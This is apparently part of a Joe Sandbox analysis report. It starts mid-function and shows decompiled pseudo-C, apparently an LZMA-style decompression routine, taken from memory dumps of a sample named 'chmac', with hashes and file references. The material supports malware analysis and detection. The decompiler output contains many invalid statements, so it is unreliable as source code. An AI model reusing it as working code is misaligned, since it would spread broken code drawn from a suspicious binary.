							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
Instruction ID: ba793bdfdeb6fca0581e378ecaac939fdd914989bdfd8c809e8e1c60c55c718d
Opcode Fuzzy Hash: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
Instruction Fuzzy Hash: 90816972D04229DBDF24DFA8C844BAEBBB0FB44305F11816AD856B72C0C7785A86DF54

Uniqueness

Uniqueness Score: -1.00%

Function 004062EB, Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004062EB() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
